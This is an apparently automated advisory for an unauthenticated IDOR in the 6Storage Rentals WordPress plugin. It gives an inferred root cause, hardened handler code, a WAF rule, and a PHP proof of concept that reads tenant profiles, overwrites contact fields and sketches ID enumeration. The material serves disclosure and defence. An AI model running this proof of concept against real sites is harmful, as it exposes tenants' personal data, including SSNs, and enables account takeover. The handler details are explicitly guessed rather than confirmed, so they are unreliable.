Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 10, 2026

CVE-2026-9185: 6Storage Rentals <= 2.22.0 Unauthenticated Insecure Direct Object Reference to Arbitrary User Disclosure and Modification via 'userId' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-9185
Severity High (CVSS 7.5)
CWE 639
Vulnerable Version 2.22.0
Patched Version
Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9185 (metadata-based): This vulnerability affects the 6Storage Rentals plugin for WordPress versions up to and including 2.22.0. It allows unauthenticated attackers to read and modify arbitrary tenant profile data via the ‘userId’ parameter. The CVSS score of 7.5 reflects a high confidentiality impact with no required privileges or user interaction.

Root Cause: The likely root cause is the registration of AJAX handlers on ‘wp_ajax_nopriv_’ hooks for both ‘six_storage_get_user_info’ and ‘six_storage_update_profile’ actions. These functions accept a tenant identifier via the ‘userId’ POST parameter. They fail to verify that the current user session corresponds to the supplied ‘userId’. No nonce validation, capability check, or ownership verification is performed. This allows direct access to functions that query and update tenant data using the user-controlled ID. This analysis is inferred from the CWE classification (639 Authorization Bypass Through User-Controlled Key) and the vulnerability description, as no source code diff is available for confirmation.

Exploitation: An unauthenticated attacker can craft POST requests to ‘/wp-admin/admin-ajax.php’ with the action parameter set to ‘six_storage_get_user_info’ or ‘six_storage_update_profile’. The attacker includes a ‘userId’ parameter with an enumerated numeric value. For ‘six_storage_get_user_info’, the response contains the tenant’s profile data including name, email, phone number, physical address, and SSN. For ‘six_storage_update_profile’, the attacker can modify these fields by supplying additional POST parameters for the fields to change. No authentication token or nonce is required. Attackers can enumerate valid ‘userId’ values by iterating through integers or obtaining them through other means.

Remediation: The plugin must validate that the authenticated user owns, or has administrative privileges over, the supplied ‘userId’. To close the unauthenticated path, the AJAX handlers should be registered on ‘wp_ajax_’ hooks only (which require an authenticated session) or implement proper capability checks using current_user_can(). The plugin should use WordPress nonces for CSRF protection and verify the nonce before processing requests. Each tenant’s data should be accessible only to that tenant or to an authorized administrator (e.g., via current_user_can('manage_options')). Without code access, the exact fix cannot be confirmed, but these patterns directly address the CWE.
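The remediation pattern above, written out as an added example of hardened handlers (this is not 6Storage Rentals' code; the handler names come from the analysis, while the nonce action 'six_storage_profile', the user-meta key and the field list are assumptions):

```php
<?php
// Added example, not 6Storage Rentals' code: hardened versions of the two
// AJAX handlers named in the analysis. The nonce action 'six_storage_profile'
// and the 'six_storage_profile' user-meta key are assumptions.

// Register on wp_ajax_ only; without a wp_ajax_nopriv_ registration,
// WordPress rejects anonymous callers before the handler runs.
add_action( 'wp_ajax_six_storage_get_user_info', 'six_storage_get_user_info_hardened' );
add_action( 'wp_ajax_six_storage_update_profile', 'six_storage_update_profile_hardened' );

// Shared gate: nonce check, then ownership-or-admin check on the supplied userId.
// Returns the authorized user ID or ends the request with a JSON error.
function six_storage_authorize_user_id() {
    // CSRF: caller must send a nonce made with wp_create_nonce( 'six_storage_profile' ).
    check_ajax_referer( 'six_storage_profile', 'nonce' );

    $requested = isset( $_POST['userId'] ) ? absint( wp_unslash( $_POST['userId'] ) ) : 0;
    $current   = get_current_user_id();
    if ( 0 === $requested || 0 === $current ) {
        wp_send_json_error( array( 'message' => 'Invalid request.' ), 400 );
    }
    // CWE-639 fix: the user-controlled key must match the session unless the
    // caller is an administrator acting on another tenant's record.
    if ( $requested !== $current && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
    }
    return $requested;
}

function six_storage_get_user_info_hardened() {
    $user_id = six_storage_authorize_user_id();
    $profile = get_user_meta( $user_id, 'six_storage_profile', true );
    wp_send_json_success( is_array( $profile ) ? $profile : array() );
}

function six_storage_update_profile_hardened() {
    $user_id = six_storage_authorize_user_id();
    $profile = get_user_meta( $user_id, 'six_storage_profile', true );
    $profile = is_array( $profile ) ? $profile : array();
    // Accept only an explicit allow-list of fields and sanitize each value.
    foreach ( array( 'name', 'email', 'phone', 'address' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            $profile[ $field ] = sanitize_text_field( wp_unslash( $_POST[ $field ] ) );
        }
    }
    update_user_meta( $user_id, 'six_storage_profile', $profile );
    wp_send_json_success( array( 'updated' => true ) );
}
```

Both wp_send_json_error() and a failed check_ajax_referer() terminate the request, so the data access below the gate runs only for an authorized session.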

Impact: Successful exploitation allows an unauthenticated attacker to retrieve sensitive personal information of any tenant, including Social Security Numbers (SSNs). This is a severe data breach. The attacker can also modify tenant profiles, potentially changing email addresses to hijack accounts, altering contact information for identity theft, or corrupting critical rental management data. The ability to both read and write tenant data without authorization enables comprehensive privacy violations and business disruption.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-9185 (metadata-based)
# Blocks unauthenticated IDOR exploitation of 6Storage Rentals via AJAX handlers
# Note: REQUEST_URI includes the query string, so @streq matches only requests with
# no query string; use REQUEST_FILENAME for a path-only match. The rule does not
# distinguish authenticated sessions, so legitimate logged-in tenant requests match too.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9185 - 6Storage Rentals IDOR via AJAX',severity:'CRITICAL',tag:'CVE-2026-9185'"
  SecRule ARGS_POST:action "@rx ^six_storage_get_user_info$|^six_storage_update_profile$" \
    "chain"
    SecRule ARGS_POST:userId "@rx ^\d+$" \
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9185 - 6Storage Rentals <= 2.22.0 - Unauthenticated Insecure Direct Object Reference to Arbitrary User Disclosure and Modification via 'userId' Parameter

// This PoC demonstrates reading and modifying arbitrary tenant profile data
// Assumptions:
// 1. The plugin registers AJAX handlers named 'six_storage_get_user_info' and 'six_storage_update_profile'
// 2. These handlers accept a 'userId' parameter without authentication
// 3. The target WordPress site uses standard admin-ajax.php

// === CONFIGURATION ===
$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change to target site
$user_id_to_enumerate = 1; // Start with a low integer ID to probe

// === STEP 1: Read tenant profile ===
echo "[+] Attempting to read tenant profile for userId: $user_id_to_enumerate\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'six_storage_get_user_info',
    'userId' => $user_id_to_enumerate
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200 || empty($response)) {
    die("[-] Failed to read tenant profile. HTTP code: $http_code\n");
}

echo "[+] Response from read attempt:\n$response\n\n";

// === STEP 2: Modify tenant profile ===
// Assumption: The update handler expects fields like 'name', 'email', 'phone', 'address', 'ssn'
$updated_data = array(
    'action' => 'six_storage_update_profile',
    'userId' => $user_id_to_enumerate,
    'name' => 'Attacker Name',
    'email' => 'attacker@example.com',
    'phone' => '555-1234'
);

echo "[+] Attempting to modify tenant profile for userId: $user_id_to_enumerate\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($updated_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    echo "[-] Update attempt failed. HTTP code: $http_code\n";
} else {
    echo "[+] Update response:\n$response\n";
}

// === STEP 3: Brute force enumeration (commented out for safety) ===
// For i in range(1, 100): repeat read with userId = i
// Uncomment below to iterate through IDs (use with caution)
/*
for ($i = 1; $i <= 100; $i++) {
    // Same logic as step 1, but with $i as userId
    // Add rate limiting if needed
}
*/

?>
